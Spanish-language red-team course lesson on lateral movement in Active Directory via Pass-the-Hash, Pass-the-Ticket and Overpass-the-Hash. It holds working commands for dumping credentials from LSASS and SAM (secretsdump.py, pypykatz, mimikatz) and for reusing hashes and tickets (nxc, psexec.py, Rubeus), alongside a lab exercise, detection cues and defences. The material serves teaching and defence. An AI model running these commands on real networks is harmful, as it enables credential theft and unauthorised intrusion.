Parte: 7 — Red Team y operaciones ofensivas · Fuente: The Hacker Recipes / MITRE ATT&CK T1550 ⏱️ Duración estimada: 110 min · Nivel: Avanzado
Dominar el movimiento lateral en Active Directory mediante reutilización de credenciales sin conocer la contraseña en claro: Pass-the-Hash (PtH), Pass-the-Ticket (PtT) y Overpass-the-Hash. El alumno aprenderá a extraer material de autenticación, reutilizarlo para autenticarse en otras máquinas del lab y entender por qué NTLM y Kerberos permiten estos abusos.
Al finalizar, el alumno podrá:
| # | Tema | Por qué importa |
|---|---|---|
| 1 | NTLM y el hash | Base de Pass-the-Hash |
| 2 | Extracción de credenciales | LSASS, SAM, tickets |
| 3 | Pass-the-Hash (T1550.002) |
Movimiento lateral sin contraseña |
| 4 | Pass-the-Ticket (T1550.003) |
Reutilizar TGT/TGS |
| 5 | Overpass-the-Hash | Del hash NTLM a un TGT |
| 6 | Movimiento lateral | SMB/WMI/WinRM con credenciales |
| 7 | Defensas | Credential Guard, tiering, LSA |
psexec.py, wmiexec.py, secretsdump.py); NetExec (nxc); Rubeus para tickets.⚠️ Extraer credenciales de LSASS y reutilizarlas se practica solo en tu laboratorio. En un engagement real es una de las acciones más monitorizadas: hazla comprendiendo la telemetría. Nunca en sistemas ajenos sin autorización escrita.
text
secretsdump.py lab.local/adminlocal:pass@10.10.10.20
o pypykatz lsa minidump lsass.dmp sobre un volcado.
2. Pass-the-Hash con nxc:
bash
nxc smb 10.10.10.30 -u Administrator -H <NTLM_HASH> --local-auth
Autentícate sin conocer la contraseña. 3. Ejecución remota por PtH:
bash
psexec.py -hashes :<NTLM_HASH> Administrator@10.10.10.30
Rubeus.exe asktgt /user:svc /rc4:<HASH> /ptt para obtener e inyectar un TGT.Rubeus dump / mimikatz sekurlsa::tickets /export) e inyéctalo con Rubeus.exe ptt /ticket:ticket.kirbi.4624 con tipo/paquete anómalo y accesos a LSASS (Sysmon EID 10) que delatan la técnica.klist.Partiendo de admin local en una máquina del lab, muévete lateralmente a otras dos máquinas usando Pass-the-Hash y Pass-the-Ticket (una técnica cada una), sin conocer contraseñas en claro. Criterio de aceptación: obtienes ejecución de comandos en dos máquinas destino distintas, una vía PtH y otra vía PtT, mostrando los comandos empleados y el material (hash/ticket) reutilizado. Todo en tu laboratorio.
| Síntoma / mensaje | Causa y cómo arreglar |
|---|---|
PtH rechazado (STATUS_LOGON_FAILURE) |
Hash o usuario incorrecto, o cuenta de dominio (usa --local-auth para local) |
| No puedo leer LSASS | Falta admin local o Credential Guard activo; consíguelo o cambia de técnica |
| PtT no autentica | Ticket expirado o para otro servicio; verifica caducidad y SPN |
| Overpass falla | Etype/hash equivocado; usa el hash NTLM correcto con /rc4 |
| Detectado al dumpear | Acceso a LSASS muy vigilado; asume telemetría (Sysmon EID 10) |
❓ ¿PtH sigue funcionando en Windows moderno? Sí, mientras se use NTLM. Credential Guard, LSA protection y el modelo de tiering lo dificultan, pero muchos entornos siguen siendo vulnerables.
❓ ¿Diferencia entre PtH y PtT? PtH reutiliza el hash NTLM (autenticación NTLM); PtT reutiliza un ticket Kerberos ya emitido. Overpass-the-Hash es el puente: del hash a un TGT.
❓ ¿Cómo se defiende una organización? Credential Guard, deshabilitar NTLM donde se pueda, tiering administrativo, LAPS para contraseñas locales únicas y monitorización de accesos a LSASS.
T1550). https://attack.mitre.org/techniques/T1550/Clase 171 — Active Directory: Kerberoasting y ataques a Kerberos